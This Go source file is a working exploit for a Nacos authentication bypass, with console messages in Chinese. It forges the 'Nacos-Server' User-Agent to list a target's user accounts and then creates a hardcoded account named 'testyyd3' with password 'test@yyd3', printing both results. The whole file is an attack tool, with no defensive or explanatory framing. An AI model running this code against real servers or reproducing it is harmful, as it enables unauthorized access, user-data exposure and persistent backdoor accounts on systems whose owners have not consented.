package main

import (
	//"bytes"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func setRoute(u string){
	url := u+"nacos/v1/auth/users?pageNo=1&pageSize=9"
	httpClient:=&http.Client{}
	requests,err:=http.NewRequest("GET",url,nil)
	requests.Header.Set("User-Agent","Nacos-Server")
	if err!=nil{
		panic(err)
	}
	res,err:=httpClient.Do(requests)
	if err!=nil{
		panic(err)
	}
	defer res.Body.Close()
	content,_:=ioutil.ReadAll(res.Body)
	if res.StatusCode==200 && strings.Index(string(content),"pageItems")!=-1{
		res:=regexp.MustCompile(`\[\{(.*)}]`)
		if res==nil{
			panic(res)
		}
		rs1:=res.FindAllStringSubmatch(string(content),-1)
		fmt.Println("[*]测试地址:"+u+"nacos")
		fmt.Println("[*]存在：",rs1[0][1])
	}else {
		fmt.Println("[!]状态码:",res.StatusCode,"检查版本是否存在漏洞范围")
	}
	defer refResh(u)
}

func refResh(u string){
	url:=u+"nacos/v1/auth/users?username=testyyd3&password=test@yyd3"
	httpClient:=&http.Client{}
	requests,err:=http.NewRequest("POST",url,nil)
	requests.Header.Set("User-Agent","Nacos-Server")
	if err!=nil{
		panic(err)
	}
	res,err:=httpClient.Do(requests)
	if err!=nil{
		panic(err)
	}
	defer res.Body.Close()
	//con,_:=ioutil.ReadAll(res.Body)
	content,_:=ioutil.ReadAll(res.Body)
	if res.StatusCode==200&& strings.Index(string(content),"create user ok")!=-1{
		fmt.Println("[*]状态码:",res.StatusCode)
		fmt.Println("[*]用户：testyyd3 密码：test@yyd3")
	}else {
		fmt.Println("[!]状态码:",res.StatusCode)
	}

}

func main() {
	logo1:="运行: "+os.Args[0]+" ip "
	if len(os.Args)<=1{
		fmt.Println(logo1)
	}else {
		aa:=os.Args[1]
		if aa[len(aa)-1:] == "/" {
			setRoute(aa)
		} else {
			fmt.Println("请检查url格式")
		}
	}
}
